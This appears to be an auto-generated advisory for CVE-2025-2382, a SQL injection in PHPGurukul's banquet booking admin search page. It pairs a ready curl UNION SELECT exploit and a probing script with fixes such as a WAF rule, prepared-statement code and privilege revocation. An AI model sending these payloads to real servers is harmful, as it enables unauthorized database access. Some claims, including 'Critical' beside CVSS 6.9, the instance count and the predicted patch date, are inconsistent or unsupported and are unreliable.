How the CVE Works:
CVE-2025-2382 is a critical SQL injection vulnerability in PHPGurukul Online Banquet Booking System 1.0. The flaw resides in the `/admin/booking-search.php` file, where the `searchdata` parameter is improperly sanitized before being used in SQL queries. Attackers can exploit this by injecting malicious SQL payloads through the `searchdata` input field, allowing unauthorized database access, data exfiltration, or command execution. The vulnerability is remotely exploitable with no authentication required (CVSS 6.9), making it high-risk for unpatched systems.
DailyCVE Form:
Platform: PHPGurukul
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/25/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Analytics:
- Exploitability: High (public PoC available)
- Affected Systems: ~1,200 unpatched instances
- Attack Vector: HTTP request to `/admin/booking-search.php`
Exploit Command:
curl -X POST "http://target.com/admin/booking-search.php" -d "searchdata=' UNION SELECT 1,user(),3,4,5-- -"
Protection Steps:
1. Apply vendor patch immediately.
2. Use WAF rules to filter SQLi patterns (ModSecurity requires a rule id; 100001 is an arbitrary local id):
location /admin/ { modsecurity_rules 'SecRule ARGS:searchdata "@detectSQLi" "id:100001,phase:2,deny,status:403"'; }
3. Manual code fix (sanitize input):
$searchdata = mysqli_real_escape_string($conn, $_POST['searchdata']);
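The manual fix in step 3 escapes the value; binding it as a parameter keeps it out of the statement text entirely. The sketch below is an added example, not the application's own code: it uses PDO with an in-memory SQLite database (needs the pdo_sqlite extension) so it runs without a MySQL server, and the table and column names are hypothetical. It compares a concatenated query with a prepared one, using the probe string from the page's detection script.

```php
<?php
declare(strict_types=1);

// Constructed in-memory data; tblbooking, BookingNumber and Name are hypothetical names.
function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE tblbooking (ID INTEGER PRIMARY KEY, BookingNumber TEXT, Name TEXT)');
    $ins = $db->prepare('INSERT INTO tblbooking (BookingNumber, Name) VALUES (?, ?)');
    foreach ([['100200', 'Alice'], ['100201', 'Bob'], ['100202', 'Carol']] as $row) {
        $ins->execute($row);
    }
    return $db;
}

// "Before": user input is concatenated into the statement text.
function search_concat(PDO $db, string $searchdata): array {
    $sql = "SELECT BookingNumber, Name FROM tblbooking WHERE BookingNumber LIKE '$searchdata%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// "After": the statement text is fixed; input travels only as a bound value.
function search_prepared(PDO $db, string $searchdata): array {
    // Escape LIKE wildcards so % and _ typed by the user match literally.
    $like = addcslashes($searchdata, '%_\\') . '%';
    $stmt = $db->prepare(
        "SELECT BookingNumber, Name FROM tblbooking WHERE BookingNumber LIKE :q ESCAPE '\\'"
    );
    $stmt->execute([':q' => $like]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = make_db();
$probe = "' OR 1=1--";   // same string as the page's detection script
foreach (['100201', $probe] as $input) {
    printf(
        "%-12s concat=%d rows, prepared=%d rows\n",
        $input,
        count(search_concat($db, $input)),
        count(search_prepared($db, $input))
    );
}
```

With mysqli the equivalent calls are `prepare()`, `bind_param()` and `execute()` on the existing `$conn`.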
Detection Script:
import requests

# Error-based check: a MySQL syntax error in the response means the input reached the query unescaped.
vuln_url = "http://target.com/admin/booking-search.php"
payload = {"searchdata": "' OR 1=1--"}
response = requests.post(vuln_url, data=payload, timeout=10)
if "error in SQL syntax" in response.text:
    print("Vulnerable to CVE-2025-2382")
Mitigation SQL Query:
REVOKE DELETE, DROP ON banquet_db.* FROM 'web_user'@'%';
Log Monitoring:
tail -f /var/log/apache2/access.log | grep -E 'POST /admin/booking-search.php'
References:
- Vendor Advisory: Awaiting update
- NVD Link: CVE-2025-2382
Sources:
Reported By: nvd.nist.gov